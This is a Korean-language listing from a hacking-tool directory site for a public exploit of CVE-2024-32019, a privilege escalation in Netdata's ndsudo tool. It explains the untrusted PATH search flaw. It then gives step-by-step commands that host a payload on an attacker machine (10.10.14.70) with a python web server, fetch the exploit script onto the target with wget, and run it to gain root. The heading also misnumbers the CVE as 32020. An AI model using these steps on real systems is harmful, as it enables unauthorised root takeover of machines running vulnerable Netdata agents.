Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/justjoeyking/cve-2024-32019-ndsudo
Privilege EscalationVulnerability AnalysisExploitationPost-ExploitationPenetration TestingRed Teaming
GitHubjustjoeyking/cve-2024-32019-ndsudo

CVE-2024-32019-ndsudo

# CVE-2024-32020 Netdata Agent ndsudo 권한 상승 익스플로잇 Netdata Agent의 ndsudo 도구에서 CVE-2024-32019를 악용하는 Bash 기반 권한 상승 익스플로잇으로, 신뢰할 수 없는 PATH 검색을 활용하여 루트 권한으로 임의 바이너리를 실행합니다.

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기
129개월 전아직 검토되지 않음

ndsudo 취약점은 Netdata Agent의 일부인 ndsudo 도구에서 신뢰할 수 없는 검색 경로를 악용하여 공격자가 root 권한을 획득할 수 있게 합니다. 공격자가 쓰기 가능한 디렉터리에 악성 바이너리를 배치하고 PATH 환경 변수를 그에 맞게 조작하면 상승된 권한으로 임의의 프로그램을 실행할 수 있습니다.

CVE-2024-32019로 식별되는 ndsudo 취약점은 Netdata Agent에 포함된 ndsudo 도구의 v1.45.0 이하 버전에 영향을 미칩니다. 이 취약점으로 인해 해당 도구가 설치된 시스템에서 공격자가 권한을 상승시킬 수 있습니다.

취약점이 작동하는 방식:

악용 메커니즘:-

  • 신뢰할 수 없는 검색 경로: ndsudo 도구는 외부 명령을 찾기 위해 PATH 환경 변수를 사용합니다. 공격자는 이 변수를 자신이 제어하는 디렉터리를 가리키도록 조작할 수 있습니다.

  • 악성 바이너리 실행: ndsudo가 실행을 허용하는 명령(예: nvme)과 동일한 이름의 악성 실행 파일을
    쓰기 가능한 디렉터리에 배치함으로써, 공격자는 root 권한으로 임의의 코드를 실행할 수 있습니다.

공격 복잡도:-

  • 낮은 복잡도: 이 공격은 고급 기술을 요구하지 않으며, 쉽게 제작된 bash 스크립트가 권한 상승에 사용될 수 있어 많은 잠재적 공격자에게 접근 가능합니다.

취약점의 영향:-

  • 권한 상승: 성공적으로 악용하면 공격자가 root 접근 권한을 획득할 수 있으며, 이는 영향을 받는 시스템에 대한 완전한 제어로 이어질 수 있습니다.

  • 잠재적 위험: 이로 인해 승인되지 않은 데이터 접근, 시스템 조작, 네트워크 리소스의 추가 악용이 발생할 수 있습니다.

권한 상승

나는 사용자에서 root로 손쉽게 접근 권한을 얻기 위한 두 개의 bash 스크립트를 만들었습니다. 아래에 설명된 단계를 따르세요 :-

root@kitploit:~
  git clone https://github.com/justjoeyking/CVE-2024-32019-ndsudo.git

  cd CVE-2024-32019-ndsudo

  chmod +x ndsudo_exp.sh

이제 python 서버를 생성하세요 :

root@kitploit:~
  python3 -m http.server 8080

ndsudo_exploit.sh 파일을 gedit 또는 pluma(사용 가능한 편집기)로 여세요. 다음과 같은 wget 명령어를 볼 수 있을 것입니다 :

root@kitploit:~
  wget http://10.10.14.70:8080/nvme -o /tmp/nvme

IP 주소를 자신의 머신 IP로 변경하세요.

이제 대상 머신으로 이동하여 터미널을 열고 다음을 수행하세요:

root@kitploit:~
  wget http://<your-ip-addr>:8080/ndsudo_exploit.sh

  chmod +x ndsudo_exploit.sh

  ./ndsudo_exploit.sh
도구 다운로드